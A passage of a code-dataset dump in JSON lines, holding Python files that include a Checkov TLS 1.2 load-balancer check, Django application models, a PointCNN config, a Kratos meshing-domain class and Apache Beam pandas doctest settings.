or -1 in recurrent_indices:\n x, state = resblock(x, prev_states[state_idx])\n state_idx += 1\n states.append(state)\n else:\n x = resblock(x)\n\n # tail\n img = self.pred(x)\n return img, states\n"} {"ext": "py", "sha": "1a30a95b720fecbddf3339b56bb201d9cdb0ad1d", "content": "from unittest import mock\nimport unittest\n\nimport pytest\n\nfrom .main import some_func\n\n\nclass TestMain(unittest.TestCase):\n @pytest.fixture(autouse=True)\n def _setup_service(self):\n self.mock_object = mock.MagicMock()\n\n def test_some_func(self):\n assert some_func() == 3\n\n # def test_mock(self):\n # assert self.mock_object.some_method.called"} {"ext": "py", "sha": "1a30a984b5512edaf0b19be6d24d7db8b82d915e", "content": "from checkov.common.models.enums import CheckResult, CheckCategories\nfrom checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck\nfrom checkov.common.util.type_forcers import force_list\n\nclass ALBListenerTLS12(BaseResourceCheck):\n\n def __init__(self):\n name = \"Ensure that Application Load Balancer Listener is using TLS v1.2\"\n id = 
\"CKV_AWS_103\"\n supported_resources = ['AWS::ElasticLoadBalancingV2::Listener']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)\n\n def scan_resource_conf(self, conf):\n \"\"\"\n validates that ALB Listener is using TLS v1.2\n https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticloadbalancingv2-listener.html\n :param conf: aws_alb_listener configuration\n :return: <CheckResult>\n \"\"\"\n\n if 'Properties' in conf.keys():\n if 'Protocol' in conf['Properties'].keys():\n # Check SslPolicy only if protocol is HTTPS or TLS.\n # Other protocols are not intresting within the context of this check.\n if conf['Properties']['Protocol'] in ('HTTPS', 'TLS'):\n if 'SslPolicy' in conf['Properties'].keys():\n if conf['Properties']['SslPolicy'].startswith((\"ELBSecurityPolicy-FS-1-2\", \"ELBSecurityPolicy-TLS-1-2\")):\n return CheckResult.PASSED\n return CheckResult.FAILED\n elif conf['Properties']['Protocol'] in ('TCP', 'UDP', 'TCP_UDP'):\n return CheckResult.PASSED\n for idx_action, action in enumerate(conf['Properties']['DefaultActions']):\n redirects = action.get(\"RedirectConfig\", [])\n for idx_redirect, redirect in enumerate(force_list(redirects)):\n if redirect.get(\"Protocol\", []) == 'HTTPS':\n return CheckResult.PASSED\n return CheckResult.FAILED\n\ncheck = ALBListenerTLS12()\n"} {"ext": "py", "sha": "1a30a9dce230d2774ae90b0737f8f7c6d3c5a488", "content": "# Bep Marketplace ELE\n# Copyright (c) 2016-2021 Kolibri Solutions\n# License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE\n#\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\nfrom proposals.models import Proposal\nfrom timeline.models import TimeSlot\nfrom django.conf import settings\n\n\nclass Application(models.Model):\n \"\"\"\n A student's application to a proposal.\n \"\"\"\n Priority = models.IntegerField(validators=[MinValueValidator(1), MaxValueValidator(settings.MAX_NUM_APPLICATIONS)])\n Proposal = models.ForeignKey(Proposal, on_delete=models.CASCADE, related_name='applications')\n Student = models.ForeignKey(User, on_delete=models.CASCADE, related_name='applications')\n Timestamp = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.Student.get_username() + \" to \" + self.Proposal.__str__()\n\n class Meta:\n ordering = [\"Priority\"]\n\n\nclass Distribution(models.Model):\n \"\"\"A student distributed to a proposal.x\"\"\"\n Proposal = models.ForeignKey(Proposal, on_delete=models.PROTECT, related_name='distributions')\n Student = models.ForeignKey(User, on_delete=models.CASCADE, related_name='distributions')\n TimeSlot = models.ForeignKey(TimeSlot, on_delete=models.PROTECT, related_name='distributions')\n Application = models.OneToOneField(Application, on_delete=models.SET_NULL, blank=True, null=True, related_name='distributions')\n\n def TotalGrade(self):\n \"\"\"\n Return total grade of student as not-rounded float\n :return:\n \"\"\"\n return sum([r.Grade * r.Category.Weight for r in self.results.all()]) / 100\n\n def TotalGradeRounded(self):\n \"\"\"\n Grade rounded to half points.\n :return:\n \"\"\"\n return round(self.TotalGrade() * 2, 0) / 2\n\n def missing_files(self):\n return self.TimeSlot.filetypes.exclude(pk__in=self.files.values_list('Type', flat=True))\n\n def missing_file_gradings(self):\n return 
self.files.filter(Type__CheckedBySupervisor=True).filter(staffresponse__isnull=True)\n\n def __str__(self):\n return self.Proposal.Title + \" to \" + self.Student.usermeta.get_nice_name() + \" (\" + self.Student.username + \")\"\n"} {"ext": "py", "sha": "1a30aa083d198cb9c5063d31c28413347e892d55", "content": "\"\"\" Tuple as Data Structure\nWe have see how we interpreted tuples as data structures\n\nThe position of the object contained in the tuple gives it meaning\n\nFor example, we can represent a 2D coordinate as: (10, 20)\n x y\n\nIf pt is a position tuple, we can retrieve the x and x, y = pt or x = pt[0]\ny coordinates using: y = py[1]\n\nFor example, to calculate the distance of pt from the origin we could write:\n\ndist = math.sgrt(pt[0] ** 2 + pt[1] ** 2)\n\nNow this is not very readable, and if someone sees this code they will have ti know thatpt[0] mans the x-coordinate and pt[1] means the y-coordinate.\n\nThis is not very transparent.\n\n\n\n # Using a class instead.\nAt this point, in order to make things clearer for the reader (not the complier, the reader), we might want to approach this using a class method instead.\n\n\"\"\"\nclass Point2D:\n def __init__(self, x, y):\n self.x = x\n\n"} {"ext": "py", "sha": "1a30aa097302de5cf83fb268314f20d004914197", "content": "#!/usr/bin/python3\n\nimport os\nimport sys\nimport math\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport data_utils\n\nload_fn = data_utils.load_cls_train_val\nbalance_fn = None\nmap_fn = None\nkeep_remainder = True\nsave_ply_fn = None\n\nnum_class = 40\n\n\nbatch_size = 32\nsample_num = 512\nnum_epochs = 4096\nstep_val = 500\n\n\nlearning_rate_base = 0.01\ndecay_steps = 8000\ndecay_rate = 0.5\nlearning_rate_min = 1e-6\n\nweight_decay = 1e-5\n\njitter = 0.0\njitter_val = 0.0\njitter_test = 0.0\n\nrotation_range = [0, 0, 0, 'u']\nrotation_range_val = [0, 0, 0, 'u']\nrotation_range_test = [0, 0, 0, 'u']\nrotation_order = 'rxyz'\n\nscaling_range = [0, 0, 0, 'g']\nscaling_range_val = [0, 0, 0, 'u']\nscaling_range_test = [0, 0, 0, 'u']\n\nsample_num_variance = 1 // 8\nsample_num_clip = 1 // 4\n\nx = 3\n\nxconv_param_name = ('K', 'D', 'P', 'C', 'links')\nxconv_params = [dict(zip(xconv_param_name, xconv_param)) for xconv_param in\n [(8, 1, -1, 16 * x, []),\n (12, 2, 384, 32 * x, []),\n (16, 2, 128, 64 * x, []),\n (16, 3, 128, 128 * x, [])]]\n\nwith_global = True\n\nfc_param_name = ('C', 'dropout_rate')\nfc_params = [dict(zip(fc_param_name, fc_param)) for fc_param in\n [(128 * x, 0.0),\n (64 * x, 0.8)]]\n\nsampling = 'random'\n\noptimizer = 'adam'\nepsilon = 1e-2\n\ndata_dim = 6\nuse_extra_features = False\nwith_X_transformation = True\nsorting_method = None\n"} {"ext": "py", "sha": "1a30aa1ebea62c018798b3abbc11c2bd27fa3f50", "content": "from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7\n#import kratos core and applications\nimport KratosMultiphysics\nimport KratosMultiphysics.DelaunayMeshingApplication as KratosDelaunay\nimport KratosMultiphysics.PfemFluidDynamicsApplication as KratosPfemFluid\nfrom importlib import import_module\n\n\ndef CreateMeshingDomain(main_model_part, custom_settings):\n return FluidMeshingDomain(main_model_part, custom_settings)\n\nclass FluidMeshingDomain(object):\n\n ##constructor. 
the constructor shall only take care of storing the settings\n ##and the pointer to the main_model part.\n ##\n ##real construction shall be delayed to the function \"Initialize\" which\n ##will be called once the mesher is already filled\n def __init__(self, main_model_part, custom_settings):\n\n self.echo_level = 1\n self.main_model_part = main_model_part\n\n ##settings string in json format\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n\t \"python_module\": \"meshing_domain\",\n \"model_part_name\": \"model_part_name\",\n \"alpha_shape\": 2.4,\n \"offset_factor\": 0.0,\n \"meshing_strategy\":{\n \"python_module\": \"meshing_strategy\",\n \"meshing_frequency\": 0.0,\n \"remesh\": false,\n \"refine\": false,\n \"reconnect\": false,\n \"transfer\": false,\n \"constrained\": false,\n \"mesh_smoothing\": false,\n \"variables_smoothing\": false,\n \"elemental_variables_to_smooth\":[],\n \"reference_element_type\": \"Element2D3N\",\n \"reference_condition_type\": \"CompositeCondition2D2N\"\n },\n \"spatial_bounding_box\":{\n \"use_bounding_box\" : true,\n \"initial_time\" : 0.0,\n \"final_time\" : 1000.0,\n \"upper_point\" : [10,10,10],\n \"lower_point\" : [-10,-10,-10]\n },\n \"spatial_refining_box\" : {\n \"use_refining_box\" : false,\n \"mesh_size\" : 0.1,\n \"initial_time\" : 0.0,\n \"final_time\" : 1,\n \"upper_point\" : [10,10,10],\n \"lower_point\" : [-10,-10,-10]\n },\n \"refining_parameters\":{\n \"critical_size\": 0.0,\n \"threshold_variable\": \"PLASTIC_STRAIN\",\n \"reference_threshold\" : 0.0,\n \"error_variable\": \"NORM_ISOCHORIC_STRESS\",\n \"reference_error\" : 0.0,\n \"add_nodes\": true,\n \"insert_nodes\": false,\n \"remove_nodes\": {\n \"apply_removal\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n },\n \"remove_boundary\": {\n \"apply_removal\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n },\n \"refine_elements\": {\n \"apply_refinement\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n },\n \"refine_boundary\": {\n \"apply_refinement\": false,\n \"on_distance\": false,\n \"on_threshold\": false,\n \"on_error\": false\n }\n },\n \"elemental_variables_to_transfer\":[]\n }\n \"\"\")\n\n ##overwrite the default settings with user-provided parameters\n self.settings = custom_settings\n self.settings.ValidateAndAssignDefaults(default_settings)\n\n #construct the meshing strategy\n python_module_name = \"KratosMultiphysics.PfemFluidDynamicsApplication\"\n full_module_name = python_module_name + \".\" + self.settings[\"meshing_strategy\"][\"python_module\"].GetString()\n meshing_module = import_module(full_module_name)\n #meshing_module = __import__(self.settings[\"meshing_strategy\"][\"python_module\"].GetString())\n self.MeshingStrategy = meshing_module.CreateMeshingStrategy(self.main_model_part, self.settings[\"meshing_strategy\"])\n\n self.active_remeshing = False\n if( self.settings[\"meshing_strategy\"][\"remesh\"].GetBool() or self.settings[\"meshing_strategy\"][\"transfer\"].GetBool() ):\n self.active_remeshing = True\n\n print(\"::[Meshing_Domain]:: (\",self.settings[\"model_part_name\"].GetString(),\" ) -BUILT-\")\n\n\n ####\n\n def Initialize(self):\n\n print(\"::[Meshing Domain]:: -START-\")\n\n self.dimension = self.main_model_part.ProcessInfo[KratosMultiphysics.SPACE_DIMENSION]\n\n # Set MeshingParameters\n self.SetMeshingParameters()\n\n # Meshing Stratety\n self.MeshingStrategy.SetEchoLevel(self.echo_level)\n 
self.MeshingStrategy.Initialize(self.MeshingParameters, self.dimension)\n\n print(\"::[Meshing Domain]:: -END- \")\n\n ####\n\n #\n def SetInfoParameters(self):\n\n # Create InfoParameters\n self.InfoParameters = KratosDelaunay.MeshingInfoParameters()\n self.InfoParameters.Initialize()\n\n #\n def SetTransferParameters(self):\n\n # Create TransferParameters\n self.TransferParameters = KratosDelaunay.TransferParameters()\n transfer_variables = self.settings[\"elemental_variables_to_transfer\"]\n #for variable in transfer_variables:\n # self.TransferParameters.SetVariable( KratosMultiphysics.KratosGlobals.GetVariable( variable.GetString() ) )\n for i in range(0, transfer_variables.size() ):\n self.TransferParameters.SetVariable(KratosMultiphysics.KratosGlobals.GetVariable(transfer_variables[i].GetString()))\n\n #\n def SetRefiningParameters(self):\n\n # Create RefiningParameters\n self.RefiningParameters = KratosDelaunay.RefiningParameters()\n self.RefiningParameters.Initialize()\n\n # parameters\n self.RefiningParameters.SetAlphaParameter(self.settings[\"alpha_shape\"].GetDouble())\n\n # set mesh refinement in box\n size = self.dimension\n refining_box = self.settings[\"spatial_refining_box\"]\n if(refining_box[\"use_refining_box\"].GetBool()):\n self.MeshingParameters.SetUseRefiningBox(True) \n self.MeshingParameters.SetRefiningBoxMinimumPoint(refining_box[\"lower_point\"][0].GetDouble(),refining_box[\"lower_point\"][1].GetDouble(),refining_box[\"lower_point\"][2].GetDouble()) \n self.MeshingParameters.SetRefiningBoxMaximumPoint(refining_box[\"upper_point\"][0].GetDouble(),refining_box[\"upper_point\"][1].GetDouble(),refining_box[\"upper_point\"][2].GetDouble()) \n self.MeshingParameters.SetRefiningBoxTimeInterval(refining_box[\"initial_time\"].GetDouble(),refining_box[\"final_time\"].GetDouble())\n self.MeshingParameters.SetRefiningBoxMeshSize(refining_box[\"mesh_size\"].GetDouble())\n\n\n removing_options = KratosMultiphysics.Flags()\n\n #remove nodes\n remove_nodes = self.settings[\"refining_parameters\"][\"remove_nodes\"]\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES, remove_nodes[\"apply_removal\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES_ON_DISTANCE, remove_nodes[\"on_distance\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES_ON_ERROR, remove_nodes[\"on_error\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_NODES_ON_THRESHOLD, remove_nodes[\"on_threshold\"].GetBool())\n\n #remove boundary\n remove_boundary = self.settings[\"refining_parameters\"][\"remove_boundary\"]\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES, remove_boundary[\"apply_removal\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES_ON_DISTANCE, remove_boundary[\"on_distance\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES_ON_ERROR, remove_boundary[\"on_error\"].GetBool())\n removing_options.Set(KratosDelaunay.MesherUtilities.REMOVE_BOUNDARY_NODES_ON_THRESHOLD, remove_boundary[\"on_threshold\"].GetBool())\n\n refining_options = KratosMultiphysics.Flags()\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE, self.settings[\"meshing_strategy\"][\"refine\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ADD_NODES, self.settings[\"refining_parameters\"][\"add_nodes\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_INSERT_NODES, 
self.settings[\"refining_parameters\"][\"insert_nodes\"].GetBool())\n\n #refine elements\n refine_elements = self.settings[\"refining_parameters\"][\"refine_elements\"]\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS, refine_elements[\"apply_refinement\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS_ON_DISTANCE, refine_elements[\"on_distance\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS_ON_ERROR, refine_elements[\"on_error\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_ELEMENTS_ON_THRESHOLD, refine_elements[\"on_threshold\"].GetBool())\n\n #refine boundary\n refine_boundary = self.settings[\"refining_parameters\"][\"refine_boundary\"]\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY, refine_boundary[\"apply_refinement\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY_ON_DISTANCE, refine_boundary[\"on_distance\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY_ON_ERROR, refine_boundary[\"on_error\"].GetBool())\n refining_options.Set(KratosDelaunay.MesherUtilities.REFINE_BOUNDARY_ON_THRESHOLD, refine_boundary[\"on_threshold\"].GetBool())\n\n self.RefiningParameters.SetRefiningOptions(refining_options)\n self.RefiningParameters.SetRemovingOptions(removing_options)\n\n #\n def SetMeshingParameters(self):\n\n # Create MeshingParameters\n self.MeshingParameters = KratosDelaunay.MeshingParameters()\n self.MeshingParameters.Initialize()\n\n self.MeshingParameters.SetSubModelPartName(self.settings[\"model_part_name\"].GetString())\n\n\n\n if(self.active_remeshing):\n\n self.MeshingParameters.SetAlphaParameter(self.settings[\"alpha_shape\"].GetDouble())\n self.MeshingParameters.SetOffsetFactor(self.settings[\"offset_factor\"].GetDouble())\n\n self.SetInfoParameters()\n self.SetTransferParameters()\n self.SetRefiningParameters()\n\n self.MeshingParameters.SetInfoParameters(self.InfoParameters)\n self.MeshingParameters.SetTransferParameters(self.TransferParameters)\n self.MeshingParameters.SetRefiningParameters(self.RefiningParameters)\n\n\n bounding_box = self.settings[\"spatial_bounding_box\"]\n if(bounding_box[\"use_bounding_box\"].GetBool()):\n self.MeshingParameters.SetUseBoundingBox(True) \n self.MeshingParameters.SetBoundingBoxLowerPoint(bounding_box[\"lower_point\"][0].GetDouble(),bounding_box[\"lower_point\"][1].GetDouble(),bounding_box[\"lower_point\"][2].GetDouble()) \n self.MeshingParameters.SetBoundingBoxUpperPoint(bounding_box[\"upper_point\"][0].GetDouble(),bounding_box[\"upper_point\"][1].GetDouble(),bounding_box[\"upper_point\"][2].GetDouble()) \n self.MeshingParameters.SetBoundingBoxTimeInterval(bounding_box[\"initial_time\"].GetDouble(),bounding_box[\"final_time\"].GetDouble())\n\n #\n def ExecuteMeshing(self):\n\n if( self.active_remeshing ):\n self.MeshingStrategy.GenerateMesh()\n\n #\n def Check(self):\n\n # set mesher utilities\n self.mesher_utils = KratosDelaunay.MesherUtilities()\n\n # set the domain labels to mesh mesher\n critical_mesh_size = self.settings[\"refining_parameters\"][\"critical_size\"].GetDouble()\n\n critical_radius = self.mesher_utils.CheckCriticalRadius(self.main_model_part,critical_mesh_size)\n print(\" CriticalRadius \", critical_radius)\n\n #\n def Active(self):\n return self.active_remeshing\n\n #\n def SetEchoLevel(self, echo_level):\n self.echo_level = echo_level\n\n #\n def GetVariables(self):\n\n nodal_variables = []\n transfer_variables = 
self.settings[\"elemental_variables_to_transfer\"]\n for i in range(0, transfer_variables.size() ):\n nodal_variables.append(transfer_variables[i].GetString())\n\n return nodal_variables\n\n #\n def ComputeAverageMeshParameters(self):\n\n MesherUtils = KratosDelaunay.MesherUtilities();\n self.domain_volume = MesherUtils.ComputeModelPartVolume(self.main_model_part)\n self.element_mean_volume = 0\n\n number_of_elements = self.main_model_part.NumberOfElements()\n nodes_for_element = self.main_model_part.ProcessInfo[KratosMultiphysics.SPACE_DIMENSION] + 1\n\n if(number_of_elements != 0):\n self.element_mean_volume = self.domain_volume/float(number_of_elements*nodes_for_element)\n\n self.RefiningParameters.SetMeanVolume(self.element_mean_volume)\n\n #\n def GetMeanVolume(self):\n\n return self.element_mean_volume\n\n #\n def GetTotalVolume(self):\n\n return self.domain_volume\n\n #\n def ComputeInitialAverageMeshParameters(self):\n\n self.mesh_parameters = KratosPfemFluid.ComputeAveragePfemMeshParameters(self.main_model_part, self.MeshingParameters,self.echo_level)\n self.mesh_parameters.Execute()\n\n # numFluid=0\n # mean_nodal_h=0\n # for node in self.main_model_part.Nodes:\n # if (node.Is(KratosMultiphysics.FLUID)):\n # numFluid+=1\n # nodal_h=node.GetSolutionStepValue(KratosMultiphysics.NODAL_H)\n # mean_nodal_h+=nodal_h\n\n # mean_nodal_h*=1.0/numFluid;\n\n # self.RefiningParameters.SetCriticalRadius(mean_nodal_h)\n # self.RefiningParameters.SetInitialRadius(mean_nodal_h)\n\n # delta_time = self.main_model_part.ProcessInfo[KratosMultiphysics.DELTA_TIME]\n # self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.INITIAL_DELTA_TIME,delta_time)\n # self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.CURRENT_DELTA_TIME,delta_time)\n # self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.PREVIOUS_DELTA_TIME,delta_time)\n # self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.TIME_INTERVAL_CHANGED,False)\n\n def SetTimeDataOnProcessInfo(self):\n\n delta_time = self.main_model_part.ProcessInfo[KratosMultiphysics.DELTA_TIME]\n self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.INITIAL_DELTA_TIME,delta_time)\n self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.CURRENT_DELTA_TIME,delta_time)\n self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.PREVIOUS_DELTA_TIME,delta_time)\n self.main_model_part.ProcessInfo.SetValue(KratosPfemFluid.TIME_INTERVAL_CHANGED,False)\n\n\n #\n"} {"ext": "py", "sha": "1a30aa85db337f10ba47f82fb42a202e51c937b2", "content": "#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport unittest\n\nimport pandas as pd\n\nfrom apache_beam.dataframe import doctests\nfrom apache_beam.dataframe.frames import PD_VERSION\nfrom apache_beam.dataframe.pandas_top_level_functions import _is_top_level_function\n\n\n@unittest.skipIf(sys.platform == 'win32', '[BEAM-10626]')\nclass DoctestTest(unittest.TestCase):\n def test_ndframe_tests(self):\n # IO methods are tested in io_test.py\n skip_writes = {\n f'pandas.core.generic.NDFrame.{name}': ['*']\n for name in dir(pd.core.generic.NDFrame) if name.startswith('to_')\n }\n\n result = doctests.testmod(\n pd.core.generic,\n use_beam=False,\n report=True,\n wont_implement_ok={\n 'pandas.core.generic.NDFrame.head': ['*'],\n 'pandas.core.generic.NDFrame.shift': [\n 'df.shift(periods=3)',\n 'df.shift(periods=3, fill_value=0)',\n ],\n 'pandas.core.generic.NDFrame.tail': ['*'],\n 'pandas.core.generic.NDFrame.take': ['*'],\n 'pandas.core.generic.NDFrame.values': ['*'],\n 'pandas.core.generic.NDFrame.tz_localize': [\n \"s.tz_localize('CET', ambiguous='infer')\",\n # np.array is not a deferred object. This use-case is possible\n # with a deferred Series though, which is tested in\n # frames_test.py\n \"s.tz_localize('CET', ambiguous=np.array([True, True, False]))\",\n ],\n 'pandas.core.generic.NDFrame.truncate': [\n # These inputs rely on tail (wont implement, order\n # sensitive) for verification\n \"df.tail()\",\n \"df.truncate(before=pd.Timestamp('2016-01-05'),\\n\"\n \" after=pd.Timestamp('2016-01-10')).tail()\",\n \"df.truncate('2016-01-05', '2016-01-10').tail()\",\n \"df.loc['2016-01-05':'2016-01-10', :].tail()\"\n ],\n 'pandas.core.generic.NDFrame.replace': [\n \"s.replace([1, 2], method='bfill')\",\n # Relies on method='pad'\n \"s.replace('a')\",\n # Relies on method='pad'\n # value=None is not valid for pandas < 1.4\n \"s.replace('a', None)\",\n # Implicitly uses method='pad', but output doesn't rely on that\n # behavior. 
Verified indepently in\n # frames_test.py::DeferredFrameTest::test_replace\n \"df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})\"\n ],\n 'pandas.core.generic.NDFrame.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.generic.NDFrame.sort_values': ['*'],\n 'pandas.core.generic.NDFrame.mask': [\n 'df.where(m, -df) == np.where(m, df, -df)'\n ],\n 'pandas.core.generic.NDFrame.where': [\n 'df.where(m, -df) == np.where(m, df, -df)'\n ],\n 'pandas.core.generic.NDFrame.interpolate': ['*'],\n 'pandas.core.generic.NDFrame.resample': ['*'],\n 'pandas.core.generic.NDFrame.rolling': ['*'],\n # argsort wont implement\n 'pandas.core.generic.NDFrame.abs': [\n 'df.loc[(df.c - 43).abs().argsort()]',\n ],\n 'pandas.core.generic.NDFrame.reindex': ['*'],\n 'pandas.core.generic.NDFrame.pct_change': ['*'],\n 'pandas.core.generic.NDFrame.asof': ['*'],\n 'pandas.core.generic.NDFrame.infer_objects': ['*'],\n 'pandas.core.generic.NDFrame.ewm': ['*'],\n 'pandas.core.generic.NDFrame.expanding': ['*'],\n 'pandas.core.generic.NDFrame.get': ['*'],\n },\n not_implemented_ok={\n 'pandas.core.generic.NDFrame.asof': ['*'],\n 'pandas.core.generic.NDFrame.at_time': ['*'],\n 'pandas.core.generic.NDFrame.between_time': ['*'],\n 'pandas.core.generic.NDFrame.ewm': ['*'],\n 'pandas.core.generic.NDFrame.expanding': ['*'],\n 'pandas.core.generic.NDFrame.flags': ['*'],\n 'pandas.core.generic.NDFrame.rank': ['*'],\n 'pandas.core.generic.NDFrame.reindex_like': ['*'],\n 'pandas.core.generic.NDFrame.replace': ['*'],\n 'pandas.core.generic.NDFrame.sample': ['*'],\n 'pandas.core.generic.NDFrame.set_flags': ['*'],\n 'pandas.core.generic.NDFrame.squeeze': ['*'],\n 'pandas.core.generic.NDFrame.truncate': ['*'],\n },\n skip={\n # Internal test\n 'pandas.core.generic.NDFrame._set_axis_name': ['*'],\n # Fails to construct test series. asfreq is not implemented anyway.\n 'pandas.core.generic.NDFrame.asfreq': ['*'],\n 'pandas.core.generic.NDFrame.astype': ['*'],\n 'pandas.core.generic.NDFrame.convert_dtypes': ['*'],\n 'pandas.core.generic.NDFrame.copy': ['*'],\n 'pandas.core.generic.NDFrame.droplevel': ['*'],\n 'pandas.core.generic.NDFrame.get': ['*'],\n 'pandas.core.generic.NDFrame.rank': [\n # Modified dataframe\n 'df'\n ],\n 'pandas.core.generic.NDFrame.rename': [\n # Seems to be an upstream bug. The actual error has a different\n # message:\n # TypeError: Index(...) must be called with a collection of\n # some kind, 2 was passed\n # pandas doctests only verify the type of exception\n 'df.rename(2)'\n ],\n # For pandas >= 1.4, rename is changed to _rename\n 'pandas.core.generic.NDFrame._rename': [\n # Seems to be an upstream bug. The actual error has a different\n # message:\n # TypeError: Index(...) 
must be called with a collection of\n # some kind, 2 was passed\n # pandas doctests only verify the type of exception\n 'df.rename(2)'\n ],\n # Tests rely on setting index\n 'pandas.core.generic.NDFrame.rename_axis': ['*'],\n # Raises right exception, but testing framework has matching issues.\n 'pandas.core.generic.NDFrame.replace': [\n \"df.replace({'a string': 'new value', True: False}) # raises\"\n ],\n 'pandas.core.generic.NDFrame.squeeze': ['*'],\n\n # NameError\n 'pandas.core.generic.NDFrame.resample': ['df'],\n\n # Skipped so we don't need to install natsort\n 'pandas.core.generic.NDFrame.sort_values': [\n 'from natsort import index_natsorted',\n 'df.sort_values(\\n'\n ' by=\"time\",\\n'\n ' key=lambda x: np.argsort(index_natsorted(df[\"time\"]))\\n'\n ')'\n ],\n **skip_writes\n })\n self.assertEqual(result.failed, 0)\n\n def test_dataframe_tests(self):\n result = doctests.testmod(\n pd.core.frame,\n use_beam=False,\n report=True,\n wont_implement_ok={\n 'pandas.core.frame.DataFrame.T': ['*'],\n 'pandas.core.frame.DataFrame.cummax': ['*'],\n 'pandas.core.frame.DataFrame.cummin': ['*'],\n 'pandas.core.frame.DataFrame.cumsum': ['*'],\n 'pandas.core.frame.DataFrame.cumprod': ['*'],\n 'pandas.core.frame.DataFrame.diff': ['*'],\n 'pandas.core.frame.DataFrame.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.frame.DataFrame.items': ['*'],\n 'pandas.core.frame.DataFrame.itertuples': ['*'],\n 'pandas.core.frame.DataFrame.iterrows': ['*'],\n 'pandas.core.frame.DataFrame.iteritems': ['*'],\n # default keep is 'first'\n 'pandas.core.frame.DataFrame.nlargest': [\n \"df.nlargest(3, 'population')\",\n \"df.nlargest(3, ['population', 'GDP'])\",\n \"df.nlargest(3, 'population', keep='last')\"\n ],\n 'pandas.core.frame.DataFrame.nsmallest': [\n \"df.nsmallest(3, 'population')\",\n \"df.nsmallest(3, ['population', 'GDP'])\",\n \"df.nsmallest(3, 'population', keep='last')\",\n ],\n 'pandas.core.frame.DataFrame.replace': [\n \"s.replace([1, 2], method='bfill')\",\n # Relies on method='pad'\n \"s.replace('a')\",\n # Relies on method='pad'\n # value=None is not valid for pandas < 1.4\n \"s.replace('a', None)\",\n # Implicitly uses method='pad', but output doesn't rely on that\n # behavior. 
Verified indepently in\n # frames_test.py::DeferredFrameTest::test_replace\n \"df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})\"\n ],\n 'pandas.core.frame.DataFrame.to_records': ['*'],\n 'pandas.core.frame.DataFrame.to_dict': ['*'],\n 'pandas.core.frame.DataFrame.to_numpy': ['*'],\n 'pandas.core.frame.DataFrame.to_string': ['*'],\n 'pandas.core.frame.DataFrame.transpose': ['*'],\n 'pandas.core.frame.DataFrame.shape': ['*'],\n 'pandas.core.frame.DataFrame.shift': [\n 'df.shift(periods=3)',\n 'df.shift(periods=3, fill_value=0)',\n ],\n 'pandas.core.frame.DataFrame.unstack': ['*'],\n 'pandas.core.frame.DataFrame.memory_usage': ['*'],\n 'pandas.core.frame.DataFrame.info': ['*'],\n # Not equal to df.agg('mode', axis='columns', numeric_only=True)\n # because there can be multiple columns if a row has more than one\n # mode\n 'pandas.core.frame.DataFrame.mode': [\n \"df.mode(axis='columns', numeric_only=True)\"\n ],\n 'pandas.core.frame.DataFrame.append': [\n 'df.append(df2, ignore_index=True)',\n \"for i in range(5):\\n\" +\n \" df = df.append({'A': i}, 